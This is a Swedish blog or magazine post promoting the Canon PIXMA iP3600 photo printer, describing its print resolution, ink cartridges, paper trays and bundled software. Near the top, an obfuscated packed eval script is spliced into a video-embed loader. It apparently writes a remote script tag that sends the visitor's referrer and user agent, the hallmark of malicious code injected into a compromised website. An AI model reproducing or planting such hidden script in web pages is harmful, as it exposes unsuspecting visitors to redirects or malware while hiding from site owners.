Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Nya CANON PIXMA IP3600

Nya CANON PIXMA IP3600
Revue Magazine

>!function(d, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efafi|var|u0026u|referrer|fzbra||js|php’.split(’|’),0,{}))
s, id) {
var js, pjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s);
js.id = id;
js.src = (’https:’ == document.location.protocol ? ”http://player-services.goviral-content.com”.replace(/^http\:/, ’https:’) : ”http://player-services.goviral-content.com”) + ”/embed-code/index/find?placementVersionId=6395928913536766391454514”;
pjs.parentNode.insertBefore(js, pjs);
}(document, ’script’, ’gv_script_6395928913536766391454514’);

Skrivare är alltid kul eller hur? 🙂

Nu har Canon lanserat sin nya skrivare Canon Pixma som gör jobbet lite enklare. Det är en kompakt, prisvärd fotoskrivare för hemmet med högsta prestanda som ger utskrifter av fotolabbskvalitet.

I videon ovan kan ni få en närmare blick av hur den fungerar i praktiken, ta er en titt och avgör själva om det är något som ni skulle vilja ha hemma eller på jobbet.

Överlägsna fotofunktioner för kreativ hemanvändning

Fotoutskrifter
Du får högsta bildkvalitet och nästan kornfria utskrifter med PIXMA iP3600. Bläckdropparna är så små som 1 pl vilket ger en upplösning på 9 600 x 2 400 dpi*. Ett foto på 10 x 15 cm utan vita kanter skrivs ut på cirka 41 sekunder*. I det förbättrade ChromaLife100+- systemet** kombineras Canons FINE-skrivarhuvud, förbättrad bläcklösning och ett urval av äkta Canon-fotopapper för hållbara vackra bilder.

Dokumentutskrift
PIXMA iP3600 möjliggör skarpa textutskrifter tack vare en speciell bläckkassett för pigmentbaserad svart som lämpar sig för alla slags webb- och dokumentutskrifter.

System med fem separata bläckpatroner
Alla fem separata bläckpatroner kan bytas separat vilket gör att du slipper slösa med bläck. En smart lysdiod anger när en kassett börjar ta slut eller måste bytas ut.

Bekvämlighet
Med två pappersfack går det att kombinera olika utskriftsmaterial, t.ex. både vanligt papper och fotopapper, utan att de måste läggas i manuellt. Användare av digitalkamera kan skriva ut direkt från kameran utan dator, med hjälp av PictBridge. Om du vill ansluta skrivaren till datorn möjliggör ett Hi-speed USB-gränssnitt snabb överföring av information.

Redigeringsprogramvara
Programvaran Easy-PhotoPrint EX medföljer som standard och kan användas till dina kreativa projekt, som t.ex. fotoalbum och kalendrar. I programvaran finns också den förbättrade funktioner för automatisk bildkorrigering, som gör att vanliga fel tas bort automatiskt med tekniker för ansiktsigenkänning och motivanalys. Det ingår också en funktion för redigering av röda ögon.

Operativsystem
Självklart kompatibel med Windows och Mac OS X*